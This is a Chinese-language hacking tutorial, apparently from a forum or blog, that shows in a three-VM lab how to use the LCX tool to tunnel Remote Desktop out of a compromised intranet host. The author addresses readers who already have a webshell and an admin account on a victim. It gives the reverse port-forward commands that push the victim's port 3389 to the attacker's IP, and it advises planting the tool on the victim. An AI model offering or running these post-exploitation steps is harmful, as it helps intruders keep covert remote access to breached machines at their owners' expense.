内网渗透利器lcx使用教程

LCX使用教程 —— By Www.3ast.Cn 阿呆 实验环境：虚拟机三台 环境说明：虚拟机1（192.168.1.1）内网机器 虚拟机2（192.168.1.2|202.103.22.20）NAT服务器 虚拟机3（202.103.22.21）模拟我们自己的机器 实验说明：我用这个实验来实现通过自己的机器连接处于内网内的我们的肉鸡。 现在在坛子里面发现很多朋友都在询问这个问题，提权提成功了，但是为什么我不能连接到肉鸡的3389上面去呢？这个问题，其实是因为由于你的肉鸡是处于内部网络的，所以当我们连接过去的时候，由于NAT（网络地址转换）技术将我们的请求屏蔽掉了，这样你肯定就无法连接到你的肉鸡上面了！ 是不是感觉很头大，是不是觉得不甘心，好不容易拿得到了一个Webshell，自己煞费苦心的得到了管理员账号，并且肉鸡上面也开放了3389，但是死活连不上去，心里很是不爽，但是又找不到适当方法最终只能选择放弃！ 下面就来给大家提供一种解决的方法，这个方法不是什么新方法，只是发现坛子里面很多人都不去用，也许并不是大家不去用，而是大家不熟悉不会用罢了，现在我就来教教大家如何来使用，下面先来看看我的模拟实验环境。 来看看环境！！ 虚拟机1上是开启了3389的，我们来看看，但是你会发现我们在虚拟机3上面是连接不上去的，这就是大家经常遇到的头疼的问题！我们来试试看，是不是连接不上去，是把，连接不上去吧！ 有人肯定会说，那是因为我们的虚拟机3根本不能访问虚拟机1，那行，我在虚拟机1上面是架设了一个网站的，我们来看看能不能访问。 这是虚拟机1上面的网站，我们到虚拟机3上面来访问。 先说明一下，由于已经使用了NAT技术，所以我们还要在NAT服务器上面做PAT（端口转换，也叫端口映射）才能访问，这里我已经做了，所以直接访问看看，OK，是可以正常访问的，下面我们就来看看怎么才能连接到虚拟机1上面去！ 这里需要使用到LCX，我们机器上面必须有，而且肉鸡上面也必须有，怎么把它放到肉鸡上面去，这里我们不讨论，什么上传啊，使用肉鸡下载啊，都可以，自己去想办法，我这里讨论的是已经传上去了之后的过程。 可以看见，两边是都有的，下面我们再来看一次，我们的机器是不是连接不过去！！！确实是的，OK，开始一步一步的实现我们的目标——想办法连接到虚拟机1上面去，看我慢慢来做吧！ 首先要在虚拟机1上面运行如下指令： lcx -slave 202.103.22.21 51 192.168.1.1 3389 命令解释： lcx -slave 自己IP 映射端口（可以随便写的） 肉鸡IP 3389 命令清楚了，我们来执行一下 然后再来我们自己机器上面运行 lcx -listen 51 3389 意思是监听我们本地的51好端口，并且将51端口的信息转发给3389 下面来执行，可以看见已经有一个客户端连接上来了，OK，最后一步，在我们自己的机器上开始连接，注意看咯，神奇的一刻到来了！~~~~~ 不过要注意的是，在自己本机连接的是127.0.0.1，注意啦！ 额，不稳定，实际的过程，应该先在我们本地执行，然后再去肉鸡上执行，我结束了重新来一次！ 注意看咯，先在自己机器上执行，然后去肉鸡执行，好，现在再来连接，OK，连接上去了，现在可能有人会问，你这不是连接到自己的机器上面啊，OK，我给大家看一下，我自己开了3389没有！ 看见没，我是没开的，那连接到哪去了呢，嘿嘿，我们慢慢来看！ 前面我已经说过，这个地方你是已经获得了管理员用户名跟密码的，是你自己建立的哦，所以，这里的用户你是肯定应该知道的，这里为了实验方便，我就直接用这个啦！ 好，现在，我们来看看这是谁的桌面！想必已经有人知道了吧！ 呵呵，做的更明白点！ 我建立了这样一个文件夹，我们注销掉，然后看看哪台虚拟机上面有这个文件夹！！ OK，我自己的桌面上没有！去看看192.168.1.1——虚拟机1，也就是我们的目标机器！看见没有！ 说明刚刚成功连接上了，OK，目的达到！ 到这里，我的任务也就完成了，呵呵，实验到此结束，谢谢大家的耐心观看！ 至于LCX的原理，大家自己去网上搜索资源吧，因为要我在这里给大家说，估计那要花费更多的时间了！OK，到此结束！ By Www.3ast.Cn 阿呆 也欢迎大家去访问我的BLOG——www.doitsec.cn www.365lab.com.cn 88